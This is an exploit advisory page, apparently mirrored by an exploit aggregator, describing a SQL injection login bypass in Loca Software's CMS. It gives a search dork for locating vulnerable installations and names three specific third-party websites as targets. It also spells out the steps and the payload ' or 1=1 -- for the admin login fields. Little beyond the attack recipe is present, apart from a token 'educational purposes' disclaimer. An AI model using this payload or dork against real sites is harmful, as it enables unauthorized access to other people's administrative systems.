Advertisement






Loca Software - Sql Injection/Admin Panel Bypass

CVE Category Price Severity
Not specified CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2024-02-03
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020019

Below is a copy:

Loca Software - Sql Injection/Admin Panel Bypass
TITLE: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BLM TEK. LTD. T."
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
A critical SQL injection vulnerability has been identified in the admin panel login functionality of Local Software's CMS, specifically within the /cms/ directory. The vulnerability allows an attacker to bypass authentication controls by injecting arbitrary SQL queries, resulting in unauthorized access to the admin panel.
Proof of Concept (PoC):
URLs:
- http://izmirsunnetmerkezi.com/cms/
- https://www.ozkankirtasiye.com.tr/cms/
- https://locapp.net/cms/
1. Visit the admin login page, typically located at: https://locapp.net/cms/
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Contact
Telegram: @rootninext

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.